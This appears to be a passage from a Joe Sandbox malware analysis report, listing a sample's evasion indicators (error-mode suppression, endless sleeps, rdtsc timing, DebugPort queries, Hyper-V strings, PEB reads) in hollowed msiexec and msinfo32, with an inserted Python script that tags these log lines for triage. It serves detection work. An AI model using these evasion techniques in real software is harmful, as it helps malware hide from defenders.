          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F0096E rdtsc 13_2_04F0096E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4731
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5199
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6607
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3218
          Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 0.8 %
          Source: C:\Windows\SysWOW64\msinfo32.exe | API coverage: 2.9 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588 | Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msinfo32.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ECC110 FindFirstFileW,FindNextFileW,FindClose, 13_2_02ECC110
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
          Source: msiexec.exe, 0000000B.00000002.2530929438.0000000008CD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2400330644.0000000008CD9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000004.00000002.1873201278.0000020AFB90A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWI
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F0096E rdtsc 13_2_04F0096E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_02DAD6E0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 6_2_02DAD6E0
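          The evasion entries above (rdtsc timing, sleeps of 922337203685477 and similar, the "Hyper-V RAW" strings in memory, NtQueryInformationProcess(DebugPort), and the fs:[30h] PEB reads that follow) are individually weak but together make the verdict. The script below is an added triage example, not part of this Joe Sandbox report and not Joe Sandbox's own code: it parses behavior lines in the "Source: ... | field: detail" format of this page, tolerates the fused form ("msinfo32.exeAPI/Special ...") and the "Jump to behavior" link labels that page extraction leaves behind, tags each line with the technique it evidences, and tallies the result per process. The sample lines are constructed from entries on this page; the SetErrorMode flag values come from winbase.h; the technique labels (peb_read, rdtsc_timing, long_sleep, ...) are this script's own names, not Joe Sandbox signature names, and the 30000 threshold is the one the report itself prints (">= -30000s").

```python
"""Tag Joe Sandbox behavior lines with the evasion technique each one evidences.

Added triage example; not Joe Sandbox code. Sample lines are constructed from
entries in this report. Technique labels are this script's own.
"""
import re
from collections import Counter, defaultdict

# SetErrorMode flag values (winbase.h); the report prints only the names.
SEM_FLAGS = {
    "FAILCRITICALERRORS": 0x0001,
    "NOGPFAULTERRORBOX": 0x0002,
    "NOALIGNMENTFAULTEXCEPT": 0x0004,
    "NOOPENFILEERRORBOX": 0x8000,
}

KINDS = (
    "Code function", "Process information set", "Process information queried",
    "Process queried", "Thread delayed", "Thread sleep time",
    "Binary or memory string", "API/Special instruction interceptor",
    "Window / User API", "Window found", "API coverage", "Last function",
)
# Source column, an optional " | " separator (absent in the fused extraction form),
# the field name, then the detail. The non-greedy source stops at the field name.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|?\s*(?P<kind>"
    + "|".join(re.escape(k) for k in KINDS) + r"):\s*(?P<detail>.*?)\s*$"
)
PEB_RE = re.compile(r"fs:\[0*30h\]", re.I)  # TEB+0x30 holds the PEB pointer on x86
PUSH_RET_RE = re.compile(r"\bpush\w*\b[^;]*;\s*(?:ret|retf|iretd)\b", re.I)
FIRST_INT_RE = re.compile(r"-?\d+")
LONG_SLEEP = 30_000  # the report's own threshold (">= -30000s")

# Constructed sample input, taken from entries in this report (two in the raw fused form).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C84AA8 push ebx; ret 11_2_02C84ABB",
    r"Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02EC0868 push FFFFFFB6h; retf 13_2_02EC086A",
    r"Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX",
    r"Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D324Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F0096E rdtsc 13_2_04F0096E",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep time: -4611686018427385s >= -30000s",
    r"Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ECC110 FindFirstFileW,FindNextFileW,FindClose, 13_2_02ECC110",
    r"Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8",
    r"Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24859486 mov eax, dword ptr fs:[00000030h]11_2_24859486",
    r"Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484B480 mov eax, dword ptr fs:[00000030h] 11_2_2484B480",
    r"Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 0.8 %",
]


def parse_line(line):
    """Split one report line into source / kind / detail; None for non-Source lines."""
    line = line.replace("Jump to behavior", "").strip()  # UI link label left by extraction
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"source": m.group("source"), "kind": m.group("kind"), "detail": m.group("detail")}


def process_name(source):
    """'C:\\...\\powershell.exe TID: 5776' or 'msiexec.exe, <dump>.sdmp' -> image name."""
    head = re.split(r",|\s+TID:", source, maxsplit=1)[0]
    return head.rsplit("\\", 1)[-1].lower()


def decode_error_mode(detail):
    """'NOGPFAULTERRORBOX | NOOPENFILEERRORBOX' -> the SetErrorMode bitmask (0x8002)."""
    mode = 0
    for name in re.split(r"[|\s]+", detail.strip()):
        if name:
            mode |= SEM_FLAGS[name]  # unknown flag names raise rather than pass silently
    return mode


def classify(rec):
    """Map a parsed record to a technique label, or None if it is not an evasion indicator."""
    kind, detail = rec["kind"], rec["detail"]
    if kind == "Code function":
        if PEB_RE.search(detail):
            return "peb_read"            # PEB.BeingDebugged / NtGlobalFlag style checks
        if "rdtsc" in detail.lower():
            return "rdtsc_timing"        # timing delta to spot single-stepping/emulation
        if "FindFirstFileW" in detail:
            return "file_enumeration"    # sandbox artifact hunting on disk
        if PUSH_RET_RE.search(detail):
            return "push_ret_obfuscation"  # control flow via push/ret, defeats linear sweep
        return "code_function_other"
    if kind == "Process queried" and "DebugPort" in detail:
        return "debugport_query"
    if kind == "Binary or memory string" and "Hyper-V" in detail:
        return "hypervisor_string"
    if kind in ("Thread delayed", "Thread sleep time"):
        m = FIRST_INT_RE.search(detail)
        return "long_sleep" if m and abs(int(m.group())) >= LONG_SLEEP else "short_sleep"
    if kind == "Process information set":
        return "error_mode_set"          # SetErrorMode: hide crash dialogs while injecting
    if kind == "API/Special instruction interceptor":
        return "special_instruction_intercept"
    return None


def summarize(lines):
    """Per-process counts of technique labels: {'msiexec.exe': {'peb_read': 2, ...}, ...}."""
    per_proc = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        tag = classify(rec) if rec else None
        if tag:
            per_proc[process_name(rec["source"])][tag] += 1
    return {proc: dict(counts) for proc, counts in per_proc.items()}


def error_modes(lines):
    """Distinct SetErrorMode bitmasks seen per process, sorted."""
    modes = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["kind"] == "Process information set":
            modes[process_name(rec["source"])].add(decode_error_mode(rec["detail"]))
    return {proc: sorted(s) for proc, s in modes.items()}


if __name__ == "__main__":
    for proc, counts in summarize(SAMPLE_LINES).items():
        print(proc, counts)
    print({p: [hex(m) for m in ms] for p, ms in error_modes(SAMPLE_LINES).items()})
```

          Run it on the raw text of a report (one line per entry) and sort processes by the number of distinct labels: on this sample, msiexec.exe and msinfo32.exe, the two hollowed system binaries, collect the PEB reads, rdtsc, DebugPort and hypervisor-string indicators, while wscript.exe and powershell.exe only show SetErrorMode and the infinite sleeps. Note that short_sleep and code_function_other are counted too, so a process that only trips those is noise, not a finding.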
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24859486 mov eax, dword ptr fs:[00000030h] 11_2_24859486
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24859486 mov eax, dword ptr fs:[00000030h] 11_2_24859486
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484B480 mov eax, dword ptr fs:[00000030h] 11_2_2484B480
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248564AB mov eax, dword ptr fs:[00000030h] 11_2_248564AB
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248834B0 mov eax, dword ptr fs:[00000030h] 11_2_248834B0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248844B0 mov ecx, dword ptr fs:[00000030h] 11_2_248844B0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248DA4B0 mov eax, dword ptr fs:[00000030h] 11_2_248DA4B0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_249254DB mov eax, dword ptr fs:[00000030h] 11_2_249254DB
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248504E5 mov ecx, dword ptr fs:[00000030h] 11_2_248504E5
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248F94E0 mov eax, dword ptr fs:[00000030h] 11_2_248F94E0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2487340D mov eax, dword ptr fs:[00000030h] 11_2_2487340D
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24888402 mov eax, dword ptr fs:[00000030h] 11_2_24888402
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24888402 mov eax, dword ptr fs:[00000030h] 11_2_24888402
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24888402 mov eax, dword ptr fs:[00000030h] 11_2_24888402
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D7410 mov eax, dword ptr fs:[00000030h] 11_2_248D7410
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484C427 mov eax, dword ptr fs:[00000030h] 11_2_2484C427
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484E420 mov eax, dword ptr fs:[00000030h] 11_2_2484E420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484E420 mov eax, dword ptr fs:[00000030h] 11_2_2484E420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484E420 mov eax, dword ptr fs:[00000030h] 11_2_2484E420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h] 11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2490F453 mov eax, dword ptr fs:[00000030h] 11_2_2490F453
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h] 11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h] 11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h] 11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h] 11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h] 11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h] 11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h] 11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2484645D mov eax, dword ptr fs:[00000030h] 11_2_2484645D
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2487245A mov eax, dword ptr fs:[00000030h] 11_2_2487245A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492547F mov eax, dword ptr fs:[00000030h]11_2_2492547F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DC460 mov ecx, dword ptr fs:[00000030h]11_2_248DC460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487A470 mov eax, dword ptr fs:[00000030h]11_2_2487A470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487A470 mov eax, dword ptr fs:[00000030h]11_2_2487A470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487A470 mov eax, dword ptr fs:[00000030h]11_2_2487A470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24884588 mov eax, dword ptr fs:[00000030h]11_2_24884588
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24852582 mov eax, dword ptr fs:[00000030h]11_2_24852582
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24852582 mov ecx, dword ptr fs:[00000030h]11_2_24852582
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484758F mov eax, dword ptr fs:[00000030h]11_2_2484758F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484758F mov eax, dword ptr fs:[00000030h]11_2_2484758F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484758F mov eax, dword ptr fs:[00000030h]11_2_2484758F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E59C mov eax, dword ptr fs:[00000030h]11_2_2488E59C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DB594 mov eax, dword ptr fs:[00000030h]11_2_248DB594
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DB594 mov eax, dword ptr fs:[00000030h]11_2_248DB594
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D05A7 mov eax, dword ptr fs:[00000030h]11_2_248D05A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D05A7 mov eax, dword ptr fs:[00000030h]11_2_248D05A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D05A7 mov eax, dword ptr fs:[00000030h]11_2_248D05A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490F5BE mov eax, dword ptr fs:[00000030h]11_2_2490F5BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715A9 mov eax, dword ptr fs:[00000030h]11_2_248715A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715A9 mov eax, dword ptr fs:[00000030h]11_2_248715A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715A9 mov eax, dword ptr fs:[00000030h]11_2_248715A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715A9 mov eax, dword ptr fs:[00000030h]11_2_248715A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715A9 mov eax, dword ptr fs:[00000030h]11_2_248715A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E35BA mov eax, dword ptr fs:[00000030h]11_2_248E35BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E35BA mov eax, dword ptr fs:[00000030h]11_2_248E35BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E35BA mov eax, dword ptr fs:[00000030h]11_2_248E35BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E35BA mov eax, dword ptr fs:[00000030h]11_2_248E35BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248745B1 mov eax, dword ptr fs:[00000030h]11_2_248745B1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248745B1 mov eax, dword ptr fs:[00000030h]11_2_248745B1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487F5B0 mov eax, dword ptr fs:[00000030h]11_2_2487F5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249235D7 mov eax, dword ptr fs:[00000030h]11_2_249235D7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249235D7 mov eax, dword ptr fs:[00000030h]11_2_249235D7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249235D7 mov eax, dword ptr fs:[00000030h]11_2_249235D7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E5CF mov eax, dword ptr fs:[00000030h]11_2_2488E5CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E5CF mov eax, dword ptr fs:[00000030h]11_2_2488E5CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248855C0 mov eax, dword ptr fs:[00000030h]11_2_248855C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248565D0 mov eax, dword ptr fs:[00000030h]11_2_248565D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488A5D0 mov eax, dword ptr fs:[00000030h]11_2_2488A5D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488A5D0 mov eax, dword ptr fs:[00000030h]11_2_2488A5D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249255C9 mov eax, dword ptr fs:[00000030h]11_2_249255C9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CD5D0 mov eax, dword ptr fs:[00000030h]11_2_248CD5D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CD5D0 mov ecx, dword ptr fs:[00000030h]11_2_248CD5D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248795DA mov eax, dword ptr fs:[00000030h]11_2_248795DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
